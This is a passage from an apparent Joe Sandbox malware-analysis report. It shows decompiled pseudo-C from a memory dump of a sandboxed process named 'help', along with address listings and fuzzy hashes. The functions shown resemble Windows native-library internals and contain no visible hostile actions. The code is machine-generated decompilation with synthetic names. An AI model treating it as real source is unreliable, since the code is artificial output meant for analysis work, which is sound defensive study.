				_v1056 = _a16;
				_v1040 = _a24;
				if(E037D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0380B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x38b7b9c; // 0x0
					_t74 = L037E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03809650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L037E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0380F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E038013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L037E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03809650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x037cc608
0x037cc615
0x037cc625
0x037cc62d
0x037cc635
0x037cc640
0x037cc680
0x037cc687
0x037cc688
0x037cc689
0x037cc694
0x037cc694
0x037cc642
0x037cc64a
0x037cc697
0x03837a25
0x03837a2b
0x03837a2e
0x03837a30
0x03837bea
0x03837bea
0x00000000
0x03837bea
0x03837a36
0x03837a43
0x03837a48
0x03837a4c
0x03837a4e
0x00000000
0x00000000
0x03837a58
0x03837a5a
0x03837a5b
0x03837a5c
0x03837a5d
0x03837a63
0x03837a64
0x03837a6a
0x03837a6c
0x03837a6e
0x038379cb
0x038379cb
0x038379ce
0x038379d0
0x03837a98
0x03837a9b
0x03837a9b
0x03837a9e
0x03837aa1
0x03837bbe
0x03837bbe
0x03837bc0
0x03837be0
0x03837be0
0x03837a01
0x03837a01
0x03837a05
0x03837a07
0x03837a15
0x03837a15
0x03837a1a
0x00000000
0x03837a1a
0x03837bc2
0x03837bc6
0x03837bc9
0x03837bcd
0x03837bcf
0x038379e6
0x038379e6
0x038379eb
0x038379eb
0x038379ef
0x038379f1
0x00000000
0x00000000
0x038379f3
0x038379f5
0x038379ff
0x038379ff
0x00000000
0x038379ff
0x038379f7
0x038379fd
0x00000000
0x00000000
0x00000000
0x038379fd
0x03837bd5
0x03837bd8
0x00000000
0x00000000
0x03837ba9
0x03837bac
0x03837bb0
0x03837bb1
0x03837bb1
0x03837bb6
0x00000000
0x03837bb6
0x03837aa7
0x03837aaa
0x00000000
0x00000000
0x03837ab2
0x03837ab3
0x03837ab5
0x03837aec
0x03837aef
0x03837b25
0x03837b28
0x03837b62
0x03837b64
0x03837b8f
0x03837b92
0x03837b96
0x03837b98
0x00000000
0x00000000
0x03837b9e
0x03837b9f
0x03837ba3
0x00000000
0x03837ba3
0x03837b66
0x03837b68
0x03837ae2
0x03837ae2
0x00000000
0x03837ae2
0x03837b6e
0x03837b72
0x03837b75
0x03837b81
0x03837b85
0x03837b87
0x00000000
0x00000000
0x03837b31
0x03837b34
0x03837b3c
0x03837b45
0x03837b46
0x03837b4f
0x03837b51
0x03837b57
0x03837b59
0x03837b59
0x00000000
0x03837b59
0x03837b77
0x00000000
0x03837b77
0x03837b2a
0x00000000
0x03837b2a
0x03837af1
0x03837af3
0x00000000
0x00000000
0x03837afb
0x03837afc
0x03837afe
0x00000000
0x00000000
0x03837b00
0x03837b03
0x00000000
0x00000000
0x03837b05
0x03837b09
0x03837b0d
0x03837b0f
0x00000000
0x00000000
0x03837b18
0x03837b1d
0x00000000
0x03837b1d
0x03837ab7
0x03837ab9
0x00000000
0x00000000
0x03837abf
0x03837ac1
0x00000000
0x00000000
0x03837ac3
0x03837ac6
0x00000000
0x00000000
0x03837ac8
0x03837acc
0x03837ad0
0x03837ad2
0x00000000
0x00000000
0x03837adb
0x00000000
0x03837adb
0x038379d6
0x038379d9
0x038379dc
0x03837a91
0x03837a94
0x00000000
0x03837a94
0x038379e2
0x00000000
0x038379e2
0x03837a74
0x03837a7a
0x00000000
0x00000000
0x03837a8a
0x03837a21
0x03837a21
0x00000000
0x03837a21
0x037cc650
0x037cc651
0x037cc656
0x037cc65c
0x037cc65d
0x037cc663
0x037cc664
0x037cc66a
0x037cc66e
0x038379c5
0x038379c7
0x00000000
0x038379c7
0x037cc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4d393ed899f9d461d03bb7316a9d44db7f28e41b4dba8ab60f8d9859ccc0123
Instruction ID: 301f5cd9fb45546c5879aa3e57c9257c473186f8b02056b3992a5884c3475ba5
Opcode Fuzzy Hash: b4d393ed899f9d461d03bb7316a9d44db7f28e41b4dba8ab60f8d9859ccc0123
Instruction Fuzzy Hash: 16818EB56042469BDB25CE94C880B6AB3E8EB86354F2849EEFD45DB340D335DD41CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 03846DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E03846DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03846B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E037E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03809AE0();
					_t87 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0384795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0384795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0384795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0384795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L037E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03846B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03846B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03846B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03846B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E037E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03809AE0();
								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L037E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L037E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L037E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L037E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x03846dd4
0x03846dde
0x03846de1
0x03846de3
0x03846de6
0x03846de9
0x03846dec
0x03846def
0x03846df2
0x03846df5
0x03846dfe
0x03846e04
0x03846e09
0x03846e0d
0x03846e18
0x03846e1b
0x03846e22
0x03846e2d
0x03846e30
0x03846e36
0x03846e42
0x03846e4d
0x03846e50
0x03846e55
0x03846e5c
0x03846e6e
0x03846e5e
0x03846e67
0x03846e67
0x03846e73
0x03846e74
0x03846e77
0x03846e7c
0x03846e7d
0x03846e8e
0x03846e93
0x03846e9c
0x03846ea8
0x03846eab
0x03846eac
0x03846eb3
0x03846ecd
0x03846edc
0x03846ee2
0x03846ee5
0x03846ef2
0x03846efb
0x03846f01
0x03846f06
0x03846f0b
0x03846f11
0x03846f1a
0x03846f22
0x03846f26
0x03846f26
0x03846f33
0x03846f41
0x03846f44
0x03846f47
0x03846f54
0x03846f65
0x03846f77
0x03846f7c
0x03846f82
0x03846f91
0x03846f99
0x03846fa3
0x03846fae
0x03846fae
0x03846fba
0x03846fbb
0x03846fbc
0x03846fc1
0x03846fc2
0x03846fd3
0x03846fd8
0x03846fd8
0x03846fdf
0x03846fe8
0x03846fee
0x03846fee
0x03846ff5
0x03846ffb
0x03846ffb
0x03847004
0x00000000
0x0384700a
0x03847004
0x03846eb3
0x03846e9c
0x03847015

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: e560209d92c277844dedfdb31523e803a7926cf8f9f3d3dd3ce9585d5a919d77
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: A7718F75A00209EFCB11DFA8C944EAEFBB9FF48704F144569E504EB650E734EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0385B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0385B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x38b7b9c; // 0x0
				_t124 = L037E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03809800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E038095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E038095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L037E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03809910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E038095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x38b7b9c; // 0x0
									_t92 = L037E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03809910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E037CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0385E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0385E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E038095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0385b8d9
0x0385b8e4
0x00000000
0x0385b8e6
0x0385b8f3
0x0385b8f5
0x0385b8f5
0x0385b8f8
0x0385b920
0x0385b924
0x0385b936
0x0385b939
0x0385b93d
0x0385b948
0x0385b9a0
0x0385b9a0
0x0385b9a4
0x0385b9bf
0x0385b9c4
0x0385b9c6
0x0385b9cd
0x0385b9d1
0x0385bad4
0x0385bad8
0x0385bada
0x0385badc
0x0385badc
0x0385badf
0x0385bae0
0x0385bae2
0x0385bae4
0x0385baec
0x0385baee
0x0385baf0
0x0385baf0
0x0385baec
0x0385bafb
0x0385bafc
0x0385bafe
0x0385bb01
0x0385bb01
0x00000000
0x0385bb06
0x0385b9d7
0x0385b9db
0x0385b9db
0x0385b9de
0x0385b9de
0x0385b9e4
0x0385b9e7
0x0385b9ea
0x0385b9ec
0x0385b9ef
0x0385b9f3
0x0385ba1b
0x0385ba1b
0x0385ba23
0x0385ba24
0x0385ba27
0x0385ba2a
0x0385ba2b
0x0385ba2e
0x0385ba30
0x0385ba37
0x0385ba3f
0x0385ba9c
0x0385baa2
0x0385bb13
0x0385bb15
0x0385baae
0x0385baae
0x0385bab3
0x0385bab5
0x0385baba
0x0385bac8
0x0385bac8
0x0385baba
0x0385bacd
0x0385bacf
0x00000000
0x0385bacf
0x0385bb1a
0x00000000
0x0385bb1c
0x0385baa7
0x0385bb11
0x00000000
0x0385bb11
0x0385baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0385ba41
0x0385ba41
0x0385ba41
0x0385ba58
0x0385ba5d
0x0385ba62
0x00000000
0x00000000
0x0385ba64
0x0385ba67
0x0385ba68
0x0385ba69
0x0385ba6c
0x0385ba6f
0x0385ba71
0x0385ba78
0x0385ba80
0x00000000
0x00000000
0x0385ba90
0x0385ba90
0x0385ba97
0x00000000
0x0385ba97
0x0385b9f5
0x0385b9f7
0x0385b9f7
0x0385b9fa
0x0385ba03
0x0385ba07
0x0385ba0c
0x0385ba10
0x0385ba17
0x00000000
0x0385b9f7
0x0385b9a6
0x0385b9a8
0x0385b9af
0x0385b9b3
0x00000000
0x00000000
0x0385b9b9
0x00000000
0x0385b9b9
0x0385b94d
0x0385b98f
0x0385b995
0x0385b999
0x0385b960
0x0385b967
0x0385b968
0x0385b96a
0x00000000
0x0385b96a
0x0385b99b
0x0385b99e
0x00000000
0x00000000
0x00000000
0x0385b99e
0x0385b951
0x0385b954
0x0385b95a
0x0385b95e
0x0385b972
0x0385b979
0x0385b97d
0x0385b97f
0x0385b980
0x0385b982
0x0385b984
0x00000000
0x0385b984
0x00000000
0x0385b926
0x00000000
0x0385b926

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e72196ff98e16a93848a9a433d09bf7073fe57b69ab63f10567abd2c08ef0d
Instruction ID: 10e45fc44350eba22ecaaf4f435475cd4ce6dd7a77597f933e4eef65bc313abd
Opcode Fuzzy Hash: c3e72196ff98e16a93848a9a433d09bf7073fe57b69ab63f10567abd2c08ef0d
Instruction Fuzzy Hash: D971FE36200705AFD723CFA9CC45F66BBA5EB54720F2845A8FA55CB2E0EB70E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 037C52A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E037C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E037DEEF0(0x38b79a0);
					_t104 =  *0x38b8210; // 0x31d1cc0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E037DEB70(_t93, 0x38b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E03809890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E037DEEF0(0x38b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E037DEB70(0, 0x38b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x1d1cd802
								_t13 = _t104 + 0xc; // 0x31d1ccd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E037FF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E037DEEF0(0x38b79a0);
									__eflags =  *0x38b8210 - _t104; // 0x31d1cc0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x38b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x20031d1c
											_t95 =  *((intOrPtr*)( *_t37));
											E03844888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E037DEB70(_t95, 0x38b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E038095D0();
											L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E038095D0();
											L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E037DEB70(_t93, 0x38b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E038095D0();
										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E038095D0();
										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x20031d1c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x1d1cd802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E037FF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
